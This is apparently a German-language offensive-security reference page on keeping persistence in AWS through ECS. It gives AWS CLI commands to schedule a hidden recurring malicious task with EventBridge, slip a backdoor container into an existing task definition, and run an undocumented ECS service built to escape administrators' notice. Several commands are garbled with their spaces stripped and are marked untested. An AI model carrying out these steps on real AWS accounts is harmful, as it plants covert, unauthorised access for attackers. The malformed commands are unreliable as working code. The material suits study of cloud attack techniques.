Ein Angreifer kann mithilfe von Amazon EventBridge eine versteckte periodische ECS-Aufgabe erstellen, um die Ausführung einer bösartigen Aufgabe regelmäßig zu planen. Diese Aufgabe kann Aufklärung betreiben, Daten exfiltrieren oder Persistenz im AWS-Konto aufrechterhalten.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an Amazon EventBridge rule to trigger the task periodicallyawseventsput-rule--name"malicious-ecs-task-rule"--schedule-expression"rate(1 day)"# Add a target to the rule to run the malicious ECS taskawseventsput-targets--rule"malicious-ecs-task-rule"--targets'[{"Id": "malicious-ecs-task-target","Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster","RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role","EcsParameters": {"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task","TaskCount": 1}}]'
Hintertür-Container in bestehender ECS-Task-Definition
TODO: Test
Ein Angreifer kann einen heimlichen Hintertür-Container in einer bestehenden ECS-Task-Definition hinzufügen, der zusammen mit legitimen Containern ausgeführt wird. Der Hintertür-Container kann für Persistenz und die Ausführung von bösartigen Aktivitäten verwendet werden.
# Update the existing task definition to include the backdoor containerawsecsregister-task-definition--family"existing-task"--container-definitions'[{"name": "legitimate-container","image": "legitimate-image:latest","memory": 256,"cpu": 10,"essential": true},{"name": "backdoor-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": false}]'
Nicht dokumentierter ECS-Dienst
TODO: Test
Ein Angreifer kann einen nicht dokumentierten ECS-Dienst erstellen, der eine bösartige Aufgabe ausführt. Durch Festlegen der gewünschten Anzahl von Aufgaben auf ein Minimum und Deaktivieren des Protokollierens wird es für Administratoren schwieriger, den bösartigen Dienst zu bemerken.
# Create a malicious task definitionawsecsregister-task-definition--family"malicious-task"--container-definitions'[{"name": "malicious-container","image": "malicious-image:latest","memory": 256,"cpu": 10,"essential": true}]'# Create an undocumented ECS service with the malicious task definitionaws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster"